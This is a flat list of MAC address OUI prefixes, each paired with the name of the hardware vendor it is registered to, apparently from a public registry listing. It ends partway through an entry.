389F5A C-Kur TV Inc. 8C839D SHENZHEN XINYUPENG ELECTRONIC TECHNOLOGY CO., LTD 0081F9 Texas Instruments ECB5FA Philips Lighting BV 80B03D Apple, Inc. 28AD3E Shenzhen TONG BO WEI Technology CO.,LTD D843ED Suzuken B0C19E zte corporation 0C3747 zte corporation ACA667 Electronic Systems Protection, Inc. 000097 Dell EMC 8CCF09 Dell EMC 001C56 Pado Systems, Inc. F06D78 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E49ADC Apple, Inc. ACE4B5 Apple, Inc. D0D2B0 Apple, Inc. 70991C Shenzhen Honesty Electronics Co.,Ltd 707D95 Shenzhen City LinwlanTechnology Co. Ltd. B8D94D Sagemcom Broadband SAS 448F17 Samsung Electronics Co., Ltd. ARTIK 00FC8B Amazon Technologies Inc. 0076B1 Somfy-Protect By Myfox SAS 38A6CE SKY UK LIMITED 3456FE Cisco Meraki 80C755 Panasonic Appliances Company F0BD2E H+S Polatis Ltd 746EE4 Asia Vital Components Co.,Ltd. 0040E4 E-M TECHNOLOGY, INC. 984B4A ARRIS Group, Inc. E084F3 High Grade Controls Corporation 6CC147 Xiamen Hanin Electronic Technology Co., Ltd A072E4 NJ SYSTEM CO.,LTD 74D21D HUAWEI TECHNOLOGIES CO.,LTD 1878D4 Verizon 0C62A6 Hui Zhou Gaoshengda Technology Co.,LTD 18132D zte corporation 4C1365 Emplus Technologies CCF957 u-blox AG 3890A5 Cisco Systems, Inc BC4101 Shenzhen TINNO Mobile Technology Corp. 043A0D SM Optics S.r.l. 44EAD8 Texas Instruments C0742B SHENZHEN XUNLONG SOFTWARE CO.,LIMITED 5C6776 IDS Imaging Development Systems GmbH 1CDDEA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD CC9891 Cisco Systems, Inc 28BF89 Fiberhome Telecommunication Technologies Co.,LTD 903DBD SECURE METERS LIMITED 20EE28 Apple, Inc. B4F61C Apple, Inc. 08F4AB Apple, Inc. 8C8590 Apple, Inc. BC88C3 Ningbo Dooya Mechanic & Electronic Technology Co., Ltd 940006 jinyoung 189BA5 IEEE Registration Authority A491B1 Technicolor Delivery Technologies Belgium NV 1C7022 Murata Manufacturing Co., Ltd. FC017C Hon Hai Precision Ind. Co.,Ltd. 90324B Hon Hai Precision Ind. Co.,Ltd. 681F40 Blu Wireless Technology Ltd 90ADF7 vivo Mobile Communication Co., Ltd. 8C4500 Murata Manufacturing Co., Ltd. A43412 Thales Alenia Space 002294 KYOCERA CORPORATION 3889DC Opticon Sensors Europe B.V. 74E5F9 Intel Corporate ECFA03 FCA 6C96CF Apple, Inc. 78886D Apple, Inc. 58A0CB TrackNet, Inc BC54FC SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 0C4B54 TP-LINK TECHNOLOGIES CO.,LTD. 60F677 Intel Corporate E8E1E2 Energotest 38CD07 Beijing FaceCam Technology Co., Ltd. 40CE24 Cisco Systems, Inc 3432E6 Panasonic Industrial Devices Europe GmbH 40017A Cisco Systems, Inc 00127D MobileAria 602E20 HUAWEI TECHNOLOGIES CO.,LTD E472E2 HUAWEI TECHNOLOGIES CO.,LTD 508F4C Xiaomi Communications Co Ltd A47758 Ningbo Freewings Technologies Co.,Ltd A08869 Intel Corporate E06089 Cloudleaf, Inc. 00D060 Panasonic Europe Ltd. 94E36D Texas Instruments F0F8F2 Texas Instruments 341513 Texas Instruments 74819A PT. Hartono Istana Teknologi 283545 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 044F4C HUAWEI TECHNOLOGIES CO.,LTD 1C151F HUAWEI TECHNOLOGIES CO.,LTD 008BFC mixi,Inc. 783690 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 18B81F ARRIS Group, Inc. 7811DC XIAOMI Electronics,CO.,LTD D463C6 Motorola Mobility LLC, a Lenovo Company C444A0 Cisco Systems, Inc 18742E Amazon Technologies Inc. D837BE SHENZHEN GONGJIN ELECTRONICS CO.,LT 90A365 HMD Global Oy DC44B6 Samsung Electronics Co.,Ltd 1007B6 Samsung Electronics Co.,Ltd 342D0D Samsung Electronics Co.,Ltd A82BB5 Edgecore Networks Corporation F844E3 Taicang T&W Electronics 24A534 SynTrust Tech International Ltd. 7065A3 Kandao lightforge Co., Ltd. 14144B Ruijie Networks Co.,LTD 74D0DC Ericsson AB 085114 QINGDAO TOPSCOMM COMMUNICATION CO., LTD C08ADE Ruckus Wireless 001D2E Ruckus Wireless 54BD79 Samsung Electronics Co.,Ltd EC42B4 ADC Corporation 60DA83 Hangzhou H3C Technologies Co., Limited 2C5731 Wingtech Group (HongKong)Limited CC4639 WAAV, Inc. D8DF7A Quest Software, Inc. 70788B vivo Mobile Communication Co., Ltd. 4859A4 zte corporation AC9E17 ASUSTek COMPUTER INC. 641666 Nest Labs Inc. A0423F Tyan Computer Corp 70F11C Shenzhen Ogemray Technology Co.,Ltd D4684D Ruckus Wireless 8C0C90 Ruckus Wireless 6CAAB3 Ruckus Wireless 001392 Ruckus Wireless A0C5F2 IEEE Registration Authority A86B7C SHENZHEN FENGLIAN TECHNOLOGY CO., LTD. B03956 NETGEAR A0341B Adero Inc 8C147D IEEE Registration Authority A0AFBD Intel Corporate 7C8BCA TP-LINK TECHNOLOGIES CO.,LTD. B04E26 TP-LINK TECHNOLOGIES CO.,LTD. B089C2 Zyptonite F023B9 IEEE Registration Authority A4F4C2 VNPT TECHNOLOGY 145BE1 nyantec GmbH FC4DD4 Universal Global Scientific Industrial Co., Ltd. E4A749 Palo Alto Networks A0239F Cisco Systems, Inc 70F35A Cisco Systems, Inc 30074D SAMSUNG ELECTRO-MECHANICS(THAILAND) B4E62A LG Innotek 907065 Texas Instruments 5C6A80 Zyxel Communications Corporation D860B3 Guangdong Global Electronic Technology CO.,LTD 64351C e-CON SYSTEMS INDIA PVT LTD 605317 Sandstone Technologies A08E78 Sagemcom Broadband SAS 60BA18 nextLAP GmbH 84CD62 ShenZhen IDWELL Technology CO.,Ltd E83935 Hewlett Packard 00180A Cisco Meraki 88D50C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D428D5 TCT mobile ltd 009AD2 Cisco Systems, Inc 947BE7 Samsung Electronics Co.,Ltd 5092B9 Samsung Electronics Co.,Ltd DC74A8 Samsung Electronics Co.,Ltd 1C1FD4 LifeBEAM Technologies LTD 481063 NTT Innovation Institute, Inc. 18A958 PROVISION THAI CO., LTD. C83A6B Roku, Inc B4C6F8 Axilspot Communication 9CE951 Shenzhen Sang Fei Consumer Communications Ltd., Co. 74C9A3 Fiberhome Telecommunication Technologies Co.,LTD EC8A4C zte corporation D45F25 Shenzhen YOUHUA Technology Co., Ltd 40C8CB AM Telecom co., Ltd. 2CABEB Cisco Systems, Inc 9CAF6F ITEL MOBILE LIMITED FC539E Shanghai Wind Technologies Co.,Ltd A8D579 Beijing Chushang Science and Technology Co.,Ltd 4448C1 Hewlett Packard Enterprise 58D9D5 Tenda Technology Co.,Ltd.Dongguan branch B8D50B Sunitec Enterprise Co.,Ltd BC66DE Shadow Creator Information Technology Co.,Ltd. 64D154 Routerboard.com 001FA4 SHENZHEN GONGJIN ELECTRONICS CO.,LT C4AE12 Samsung Electronics Co.,Ltd 94D299 Techmation Co.,Ltd. 488803 ManTechnology Inc. B436E3 KBVISION GROUP 6C4B90 LiteON 04946B TECNO MOBILE LIMITED A04C5B Shenzhen TINNO Mobile Technology Corp. F85971 Intel Corporate F4E4AD zte corporation 28FF3E zte corporation B8D7AF Murata Manufacturing Co., Ltd. D4AE05 Samsung Electronics Co.,Ltd F0EE10 Samsung Electronics Co.,Ltd C4700B GUANGZHOU CHIP TECHNOLOGIES CO.,LTD 443708 MRV Comunications E048AF Premietech Limited 2C3311 Cisco Systems, Inc 5082D5 Apple, Inc. 341A35 Fiberhome Telecommunication Technologies Co.,LTD 2C029F 3ALogics 00050F Tanaka S/S Ltd. 989E63 Apple, Inc. 886B6E Apple, Inc. D4DCCD Apple, Inc. 484BAA Apple, Inc. DCA904 Apple, Inc. 6CAB31 Apple, Inc. 4C74BF Apple, Inc. BC024A HMD Global Oy 949901 Shenzhen YITOA Digital Appliance CO.,LTD 1005CA Cisco Systems, Inc 7894B4 Sercomm Corporation. 285F2F RNware Co.,Ltd. BC452E Knowledge Development for POF S.L. 706DEC Wifi-soft LLC B0C205 BIONIME 94F551 Cadi Scientific Pte Ltd 2C55D3 HUAWEI TECHNOLOGIES CO.,LTD DCC64B HUAWEI TECHNOLOGIES CO.,LTD 043389 HUAWEI TECHNOLOGIES CO.,LTD 00A068 BHP LIMITED 703ACB Google, Inc. 105AF7 ADB Italia B81DAA LG Electronics (Mobile Communications) 00E400 Sichuan Changhong Electric Ltd. 542F8A TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 6014B3 CyberTAN Technology Inc. 105611 ARRIS Group, Inc. 3CA067 Liteon Technology Corporation 1C1EE3 Hui Zhou Gaoshengda Technology Co.,LTD 44032C Intel Corporate 500FF5 Tenda Technology Co.,Ltd.Dongguan branch 00C024 EDEN SISTEMAS DE COMPUTACAO SA 7C4685 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 7868F7 YSTen Technology Co.,Ltd 004BF3 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 1C398A Fiberhome Telecommunication Technologies Co.,LTD 00179B CHANT SINCERE CO.,LTD 6C160E ShotTracker 803A0A Integrated Device Technology (Malaysia) Sdn. Bhd. A462DF DS Global. Co., LTD 4C1694 shenzhen sibituo Technology Co., Ltd F0C850 HUAWEI TECHNOLOGIES CO.,LTD C81451 HUAWEI TECHNOLOGIES CO.,LTD 44D437 Inteno Broadband Technology AB ECE154 Beijing Unisound Information Technology Co.,Ltd. E865D4 Tenda Technology Co.,Ltd.Dongguan branch 08CCA7 Cisco Systems, Inc 0896AD Cisco Systems, Inc 0823B2 vivo Mobile Communication Co., Ltd. 88C3B3 SOVICO 347877 O-Net Communications (Shenzhen) Limited 0020CC DIGITAL SERVICES, LTD. E05124 NXP Semiconductors 001DA3 SabiOso 689FF0 zte corporation 00014F Adtran Inc 285261 Cisco Systems, Inc 286F7F Cisco Systems, Inc 5CAF06 LG Electronics (Mobile Communications) F8983A Leeman International (HongKong) Limited 4CECEF Soraa, Inc. 1CEFCE bebro electronic GmbH 64DBA0 Select Comfort 8809AF Masimo Corporation 2CD02D Cisco Systems, Inc 24A7DC SKY UK LIMITED 98B6E9 Nintendo Co.,Ltd 24D51C Zhongtian broadband technology co., LTD EC43F6 Zyxel Communications Corporation 60C658 PHYTRONIX Co.,Ltd. FCB58A Wapice Ltd. 20780B Delta Faucet Company 1840A4 Shenzhen Trylong Smart Science and Technology Co., Ltd. 1C48CE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 30E171 Hewlett Packard F015B9 PlayFusion Limited 0C73BE Dongguan Haimai Electronie Technology Co.,Ltd C8AA55 Hunan Comtom Electronic Incorporated Co.,Ltd 001D72 Wistron Corporation 186590 Apple, Inc. F86214 Apple, Inc. 784F43 Apple, Inc. 404D7F Apple, Inc. 64B0A6 Apple, Inc. 7C04D0 Apple, Inc. 84FCAC Apple, Inc. DC0C5C Apple, Inc. 70700D Apple, Inc. 2CDCAD Wistron Neweb Corporation 6C5C14 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD CC8CDA Shenzhen Wei Da Intelligent Technology Go.,Ltd D436DB Jiangsu Toppower Automotive Electronics Co., Ltd D8197A Nuheara Ltd 4C38D5 MITAC COMPUTING TECHNOLOGY CORPORATION 54B56C Xi'an NovaStar Tech Co., Ltd 344CC8 Echodyne Corp 64136C zte corporation 04B648 ZENNER 98F199 NEC Platforms, Ltd. 4C7487 Leader Phone Communication Technology Co., Ltd. AC83F3 AMPAK Technology, Inc. C80CC8 HUAWEI TECHNOLOGIES CO.,LTD 0425C5 HUAWEI TECHNOLOGIES CO.,LTD 603E7B Gafachi, Inc. 90D7BE Wavelab Global Inc. 244E7B IEEE Registration Authority 30AEA4 Espressif Inc. 00501E Grass Valley, A Belden Brand EC0D9A Mellanox Technologies, Inc. 3CFA43 HUAWEI TECHNOLOGIES CO.,LTD 7823AE ARRIS Group, Inc. E80945 Integrated Device Technology (Malaysia) Sdn. Bhd. 145F94 HUAWEI TECHNOLOGIES CO.,LTD 006BF1 Cisco Systems, Inc 001F82 Cal-Comp Electronics & Communications Company Ltd. 883C1C MERCURY CORPORATION 2834A2 Cisco Systems, Inc B0A2E7 Shenzhen TINNO Mobile Technology Corp. 7C2587 chaowifi.com 002144 SS Telecoms CC61E5 Motorola Mobility LLC, a Lenovo Company 20719E SF Technology Co.,Ltd 2CC260 Oracle Corporation 3C3F51 2CRSI 3C2AF4 Brother Industries, LTD. C0854C Ragentek Technology Group D816C1 DEWAV (HK) ELECTRONICS LIMITED 40FE0D MAXIO AC64DD IEEE Registration Authority BC39D9 Z-TEC 609AC1 Apple, Inc. 748D08 Apple, Inc. 9C8BA0 Apple, Inc. 787D48 ITEL MOBILE LIMITED 8C8ABB Beijing Orient View Technology Co., Ltd. 50584F waytotec,Inc. B439D6 ProCurve Networking by HP 34F39A Intel Corporate 8C60E7 MPGIO CO.,LTD CC9470 Kinestral Technologies, Inc. 085DDD MERCURY CORPORATION 8871E5 Amazon Technologies Inc. 94B819 Nokia 00039B NetChip Technology, Inc. 383A21 IEEE Registration Authority D8380D SHENZHEN IP-COM Network Co.,Ltd FCCAC4 LifeHealth, LLC 60EFC6 Shenzhen Chima Technologies Co Limited 20DBAB Samsung Electronics Co., Ltd. 001FC6 ASUSTek COMPUTER INC. B0C128 Adler ELREHA GmbH F81D78 IEEE Registration Authority 38F7B2 SEOJUN ELECTRIC 88AD43 PEGATRON CORPORATION B4EFFA Lemobile Information Technology (Beijing) Co., Ltd. 6C71BD EZELINK TELECOM 7802B7 ShenZhen Ultra Easy Technology CO.,LTD 646184 VELUX 3087D9 Ruckus Wireless F09838 HUAWEI TECHNOLOGIES CO.,LTD CC088D Apple, Inc. 38A4ED Xiaomi Communications Co Ltd B89919 7signal Solutions, Inc F0D9B2 EXO S.A. E4C801 BLU Products Inc 001427 JazzMutant 001E84 Pika Technologies Inc. 10DDB1 Apple, Inc. 002329 DDRdrive LLC 0026AD Arada Systems, Inc. 002478 Mag Tech Electronics Co Limited 002486 DesignArt Networks 382DD1 Samsung Electronics Co.,Ltd 00265F Samsung Electronics Co.,Ltd 00233A Samsung Electronics Co.,Ltd 101250 Integrated Device Technology (Malaysia) Sdn. Bhd. 0C84DC Hon Hai Precision Ind. Co.,Ltd. C80E14 AVM Audiovisuelles Marketing und Computersysteme GmbH AC63BE Amazon Technologies Inc. 001B2C ATRON electronic GmbH 9034FC Hon Hai Precision Ind. Co.,Ltd. 889FFA Hon Hai Precision Ind. Co.,Ltd. 8C7CB5 Hon Hai Precision Ind. Co.,Ltd. C44619 Hon Hai Precision Ind. Co.,Ltd. 086A0A ASKEY COMPUTER CORP 98E7F4 Hewlett Packard 506313 Hon Hai Precision Ind. Co.,Ltd. 60D819 Hon Hai Precision Ind. Co.,Ltd. F82FA8 Hon Hai Precision Ind. Co.,Ltd. 0007AB Samsung Electronics Co.,Ltd E8E5D6 Samsung Electronics Co.,Ltd C87E75 Samsung Electronics Co.,Ltd E492FB Samsung Electronics Co.,Ltd 6CB7F4 Samsung Electronics Co.,Ltd 181EB0 Samsung Electronics Co.,Ltd 247F20 Sagemcom Broadband SAS 684898 Samsung Electronics Co.,Ltd 3423BA SAMSUNG ELECTRO-MECHANICS(THAILAND) 400E85 SAMSUNG ELECTRO-MECHANICS(THAILAND) C8BA94 SAMSUNG ELECTRO-MECHANICS(THAILAND) 843838 SAMSUNG ELECTRO-MECHANICS(THAILAND) 54880E SAMSUNG ELECTRO-MECHANICS(THAILAND) F025B7 SAMSUNG ELECTRO-MECHANICS(THAILAND) 00166C Samsung Electronics Co.,Ltd 001599 Samsung Electronics Co.,Ltd 0012FB Samsung Electronics Co.,Ltd D0667B Samsung Electronics Co.,Ltd E8039A Samsung Electronics Co.,Ltd FC1F19 SAMSUNG ELECTRO MECHANICS CO., LTD. 840B2D SAMSUNG ELECTRO MECHANICS CO., LTD. 206432 SAMSUNG ELECTRO MECHANICS CO., LTD. B407F9 SAMSUNG ELECTRO MECHANICS CO., LTD. 30CDA7 Samsung Electronics Co.,Ltd 001247 Samsung Electronics Co.,Ltd 0015B9 Samsung Electronics Co.,Ltd 1C66AA Samsung Electronics Co.,Ltd 1489FD Samsung Electronics Co.,Ltd BC851F Samsung Electronics Co.,Ltd B85E7B Samsung Electronics Co.,Ltd 002491 Samsung Electronics Co.,Ltd 3C8BFE Samsung Electronics Co.,Ltd D4E8B2 Samsung Electronics Co.,Ltd 002339 Samsung Electronics Co.,Ltd 5001BB Samsung Electronics Co.,Ltd 2C4401 Samsung Electronics Co.,Ltd B8D9CE Samsung Electronics Co.,Ltd 5C3C27 Samsung Electronics Co.,Ltd BC72B1 Samsung Electronics Co.,Ltd 78F7BE Samsung Electronics Co.,Ltd 2CAC44 CONEXTOP D013FD LG Electronics (Mobile Communications) 44AAF5 ARRIS Group, Inc. 70A84C MONAD., Inc. 84C7EA Sony Corporation 24E43F Wenzhou Kunmei Communication Technology Co.,Ltd. C40142 MaxMedia Technology Limited 8430E5 SkyHawke Technologies, LLC 1C77F6 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 58E326 Compass Technologies Inc. 001B2A Cisco Systems, Inc 749DDC 2Wire Inc F04347 HUAWEI TECHNOLOGIES CO.,LTD 9CB2B2 HUAWEI TECHNOLOGIES CO.,LTD A8C83A HUAWEI TECHNOLOGIES CO.,LTD 14DDE5 MPMKVVCL 001A09 Wayfarer Transit Systems Ltd BC644B ARRIS Group, Inc. 88797E Motorola Mobility LLC, a Lenovo Company 305890 Frontier Silicon Ltd 708BCD ASUSTek COMPUTER INC. 742344 Xiaomi Communications Co Ltd E09DFA Wanan Hongsheng Electronic Co.Ltd 003676 ARRIS Group, Inc. FC8E7E ARRIS Group, Inc. FC6FB7 ARRIS Group, Inc. D42C0F ARRIS Group, Inc. A055DE ARRIS Group, Inc. 80F503 ARRIS Group, Inc. 606405 Texas Instruments 0026F1 ProCurve Networking by HP 380DD4 Primax Electronics Ltd. 98FDB4 Primax Electronics Ltd. D8C46A Murata Manufacturing Co., Ltd. 287AEE ARRIS Group, Inc. 00258B Mellanox Technologies, Inc. 00562B Cisco Systems, Inc E8FD90 Turbostor 1899F5 Sichuan Changhong Electric Ltd. 18ABF5 Ultra Electronics Electrics B03EB0 MICRODIA Ltd. A48269 Datrium, Inc. 0025C3 21168 000F57 CABLELOGIC Co., Ltd. 000342 Nortel Networks 10E68F KWANGSUNG ELECTRONICS KOREA CO.,LTD. 4CFACA Cambridge Industries(Group) Co.,Ltd. 001591 RLW Inc. 00182E XStreamHD 001283 Nortel Networks 0011F9 Nortel Networks 001158 Nortel Networks 000F6A Nortel Networks 000E62 Nortel Networks 000CF8 Nortel Networks 000997 Nortel Networks 001CEB Nortel Networks 001C17 Nortel Networks 001A8F Nortel Networks 0017D1 Nortel Networks 0014C7 Nortel Networks 001DAF Nortel Networks D8FB68 Cloud Corner Ltd. 685388 P&S Technology 14C1FF ShenZhen QianHai Comlan communication Co.,LTD 88A6C6 Sagemcom Broadband SAS 94D469 Cisco Systems, Inc 882BD7 ADDÉNERGIE TECHNOLOGIES 0090CC PLANEX COMMUNICATIONS INC. 0022CF PLANEX COMMUNICATIONS INC. E417D8 8BITDO TECHNOLOGY HK LIMITED 2057AF Shenzhen FH-NET OPTOELECTRONICS CO.,LTD 54DC1D Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 38F8CA OWIN Inc. 44334C Shenzhen Bilian electronic CO.,LTD ACA213 Shenzhen Bilian electronic CO.,LTD 3C3300 Shenzhen Bilian electronic CO.,LTD 888322 Samsung Electronics Co.,Ltd E89309 Samsung Electronics Co.,Ltd 982F3C Sichuan Changhong Electric Ltd. 000417 ELAU AG ECFAAA The IMS Company F00786 Shandong Bittel Electronics Co., Ltd 00D0F6 Nokia 54A619 Alcatel-Lucent Shanghai Bell Co., Ltd 9CD332 PLC Technology Ltd 6CD032 LG Electronics 344DF7 LG Electronics (Mobile Communications) 583F54 LG Electronics (Mobile Communications) 64899A LG Electronics (Mobile Communications) 002105 Alcatel-Lucent IPD B0C5CA IEEE Registration Authority 7419F8 IEEE Registration Authority 001BC5 IEEE Registration Authority 48DF37 Hewlett Packard Enterprise 64BC0C LG Electronics (Mobile Communications) C0E42D TP-LINK TECHNOLOGIES CO.,LTD. 8CA6DF TP-LINK TECHNOLOGIES CO.,LTD. 8416F9 TP-LINK TECHNOLOGIES CO.,LTD. 18D6C7 TP-LINK TECHNOLOGIES CO.,LTD. 78C3E9 Samsung Electronics Co.,Ltd 8C1ABF Samsung Electronics Co.,Ltd 30CBF8 Samsung Electronics Co.,Ltd A0CBFD Samsung Electronics Co.,Ltd E45D75 Samsung Electronics Co.,Ltd 000031 QPSX COMMUNICATIONS, LTD. 000E1E QLogic Corporation 0014D1 TRENDnet, Inc. 001C14 VMware, Inc. F8A9D0 LG Electronics (Mobile Communications) CCFA00 LG Electronics (Mobile Communications) 74A722 LG Electronics (Mobile Communications) F01C13 LG Electronics (Mobile Communications) A816B2 LG Electronics (Mobile Communications) C01ADA Apple, Inc. 00121C PARROT SA 9003B7 PARROT SA 90C682 IEEE Registration Authority 58FCDB IEEE Registration Authority 0010C1 OI ELECTRIC CO.,LTD 48A9D2 Wistron Neweb Corporation 80EA23 Wistron Neweb Corporation 208756 SIEMENS AG 74B472 CIESSE FCF152 Sony Corporation 309BAD BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 483C0C HUAWEI TECHNOLOGIES CO.,LTD 005056 VMware, Inc. CC52AF Universal Global Scientific Industrial Co., Ltd. 002713 Universal Global Scientific Industrial Co., Ltd. 001BB1 Wistron Neweb Corporation BC307E Wistron Neweb Corporation BC307D Wistron Neweb Corporation 0080F7 Zenith Electronics Corporation 38A28C SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. A09E1A Polar Electro Oy B4A5EF Sercomm Corporation. 849D64 SMC Corporation 68B35E Shenzhen Neostra Technology Co.Ltd 1CD6BD LEEDARSON LIGHTING CO., LTD. AC0481 Jiangsu Huaxing Electronics Co., Ltd. 001E04 Hanson Research Corporation B09122 Texas Instruments FC51A4 ARRIS Group, Inc. 9857D3 HON HAI-CCPBG PRECISION IND.CO.,LTD. 24E271 Qingdao Hisense Communications Co.,Ltd. BC6010 Qingdao Hisense Communications Co.,Ltd. D0D94F IEEE Registration Authority 408805 Motorola Mobility LLC, a Lenovo Company 60C0BF ON Semiconductor 40562D Smartron India Pvt ltd FCF528 Zyxel Communications Corporation 00A0C5 Zyxel Communications Corporation 506583 Texas Instruments 98398E Samsung Electronics Co.,Ltd D0FCCC Samsung Electronics Co.,Ltd 44D1FA Shenzhen Yunlink Technology Co., Ltd F0F644 Whitesky Science & Technology Co.,Ltd. 001A34 Konka Group Co., Ltd. 0011FC HARTING Electronics GmbH 002389 Hangzhou H3C Technologies Co., Limited 3CE5A6 Hangzhou H3C Technologies Co., Limited 5CDD70 Hangzhou H3C Technologies Co., Limited 3C8C40 Hangzhou H3C Technologies Co., Limited 20F17C HUAWEI TECHNOLOGIES CO.,LTD 346AC2 HUAWEI TECHNOLOGIES CO.,LTD C41CFF Vizio, Inc 7C6AF3 Integrated Device Technology (Malaysia) Sdn. Bhd. C09727 SAMSUNG ELECTRO-MECHANICS(THAILAND) D8209F Cubro Acronet GesmbH 8C7716 LONGCHEER TELECOMMUNICATION LIMITED E46251 HAO CHENG GROUP LIMITED 3876D1 Euronda SpA DC293A Shenzhen Nuoshi Technology Co., LTD. 0C5101 Apple, Inc. 2CF0A2 Apple, Inc. 68FB7E Apple, Inc. 84A134 Apple, Inc. A0D385 AUMA Riester GmbH & Co. KG 1414E6 Ningbo Sanhe Digital Co.,Ltd AC6FBB TATUNG Technology Inc. 001C41 scemtec Transponder Technology GmbH 146308 JABIL CIRCUIT (SHANGHAI) LTD. 001E25 INTEK DIGITAL 00E0CF INTEGRATED DEVICE 0060B1 Input/Output, Inc. C4693E Turbulence Design Inc. 009569 LSD Science and Technology Co.,Ltd. B0CF4D MI-Zone Technology Ireland 289AFA TCT mobile ltd E04F43 Universal Global Scientific Industrial Co., Ltd. 547F54 INGENICO 003A7D Cisco Systems, Inc 001A45 GN Netcom A/S 002088 GLOBAL VILLAGE COMMUNICATION 541379 Hon Hai Precision Ind. Co.,Ltd. 90C7D8 zte corporation 6891D0 IEEE Registration Authority 904D4A Sagemcom Broadband SAS 044E5A ARRIS Group, Inc. 48C049 Broad Telecom SA 38700C ARRIS Group, Inc. 6C2483 Microsoft Mobile Oy A067BE Sicon srl 002582 Maksat Technologies (P) Ltd 18A3E8 Fiberhome Telecommunication Technologies Co.,LTD 741E93 Fiberhome Telecommunication Technologies Co.,LTD 00208F ECI Telecom Ltd. F0D1B8 LEDVANCE DC9C9F Shenzhen YOUHUA Technology Co., Ltd 74DFBF Liteon Technology Corporation F03E90 Ruckus Wireless 00A0F4 GE AC0D1B LG Electronics (Mobile Communications) FC0F4B Texas Instruments D4883F HDPRO CO., LTD. 60B617 Fiberhome Telecommunication Technologies Co.,LTD D8D723 IDS, Inc 00185C EDSLAB Technologies 000E2E Edimax Technology Co. Ltd. 00065F ECI Telecom Ltd. 844076 Drivenets 001CD7 Harman/Becker Automotive Systems GmbH 84AD58 HUAWEI TECHNOLOGIES CO.,LTD 58605F HUAWEI TECHNOLOGIES CO.,LTD 001921 Elitegroup Computer Systems Co.,Ltd. 0016EC Elitegroup Computer Systems Co.,Ltd. 000795 Elitegroup Computer Systems Co.,Ltd. 986D35 IEEE Registration Authority 88795B Konka Group Co., Ltd. 081F71 TP-LINK TECHNOLOGIES CO.,LTD. 5CCA1A Microsoft Mobile Oy 0009D2 Mai Logic Inc. 24C3F9 Securitas Direct AB 2C21D7 IMAX Corporation B07E70 Zadara Storage Ltd. 0080B1 SOFTCOM A/S 202DF8 Digital Media Cartridge Ltd. FC2FAA Nokia D8803C Anhui Huami Information Technology Company Limited 0034DA LG Electronics (Mobile Communications) 3810D5 AVM Audiovisuelles Marketing und Computersysteme GmbH 006016 CLARIION 00C88B Cisco Systems, Inc 981FB1 Shenzhen Lemon Network Technology Co.,Ltd 0C5A9E Wi-SUN Alliance 10D0AB zte corporation 0004C6 YAMAHA MOTOR CO.,LTD 202D07 Samsung Electronics Co.,Ltd B44BD2 Apple, Inc. DC415F Apple, Inc. 641225 Cisco Systems, Inc 7864E6 Green Motive Technology Limited 3CBEE1 NIKON CORPORATION 102AB3 Xiaomi Communications Co Ltd 40D357 Ison Technology Co., Ltd. A0B9ED Skytap 98D686 Chyi Lee industry Co., ltd. 8CC661 Current, powered by GE 88A084 Formation Data Systems 94C960 Zhongshan B&T technology.co.,ltd 74C330 SHENZHEN FAST TECHNOLOGIES CO.,LTD DCB3B4 Honeywell Environmental & Combustion Controls (Tianjin) Co., Ltd. 00247C Nokia Danmark A/S A41588 ARRIS Group, Inc. F45C89 Apple, Inc. 20768F Apple, Inc. 9C5CF9 Sony Corporation 0011D1 Soft Imaging System GmbH 18C501 SHENZHEN GONGJIN ELECTRONICS CO.,LT 00A0B8 NetApp E8B2AC Apple, Inc. E49A79 Apple, Inc. 30A9DE LG Innotek F01B6C vivo Mobile Communication Co., Ltd. 002266 Nokia Danmark A/S 0021FE Nokia Danmark A/S C477AB Beijing ASU Tech Co.,Ltd A8A089 Tactical Communications 48365F Wintecronics Ltd. 000BCA DATAVAN TC 702559 CyberTAN Technology Inc. 001D20 Comtrend Corporation 08373D Samsung Electronics Co.,Ltd C488E5 Samsung Electronics Co.,Ltd 0C75BD Cisco Systems, Inc 300D43 Microsoft Mobile Oy 607EDD Microsoft Mobile Oy 00000E FUJITSU LIMITED 000B5D FUJITSU LIMITED 080581 Roku, Inc. A87B39 Nokia Corporation 4C2578 Nokia Corporation BCC6DB Nokia Corporation 60A8FE Nokia Solutions and Networks GmbH & Co. KG 001D3B Nokia Danmark A/S 001DFD Nokia Danmark A/S 001E3B Nokia Danmark A/S 001EA4 Nokia Danmark A/S 0026CC Nokia Danmark A/S 000EED Nokia Danmark A/S 00119F Nokia Danmark A/S 001A16 Nokia Danmark A/S 001A89 Nokia Danmark A/S 001ADC Nokia Danmark A/S 0025CF Nokia Danmark A/S 0021AB Nokia Danmark A/S 001FDE Nokia Danmark A/S 001FDF Nokia Danmark A/S 547975 Nokia Corporation 74458A Samsung Electronics Co.,Ltd FCC734 Samsung Electronics Co.,Ltd 8425DB Samsung Electronics Co.,Ltd B0EC71 Samsung Electronics Co.,Ltd 001D00 Brivo Systems, LLC 0020D6 Breezecom, Ltd. C4473F HUAWEI TECHNOLOGIES CO.,LTD 5CDC96 Arcadyan Technology Corporation 00E063 Cabletron Systems, Inc. 000DF3 Asmax Solutions 000DB6 Broadcom 000AF7 Broadcom D40129 Broadcom 389496 Samsung Electronics Co.,Ltd 5056BF Samsung Electronics Co.,Ltd 90F1AA Samsung Electronics Co.,Ltd 1077B1 Samsung Electronics Co.,Ltd 001FC7 Casio Hitachi Mobile Communications Co., Ltd. 0CA42A OB Telecom Electronic Technology Co., Ltd 001A2A Arcadyan Technology Corporation 88252C Arcadyan Technology Corporation 1CC63C Arcadyan Technology Corporation 1883BF Arcadyan Technology Corporation 68ED43 BlackBerry RTS 70AAB2 BlackBerry RTS E458B8 Samsung Electronics Co.,Ltd 088C2C Samsung Electronics Co.,Ltd A49A58 Samsung Electronics Co.,Ltd 08EE8B Samsung 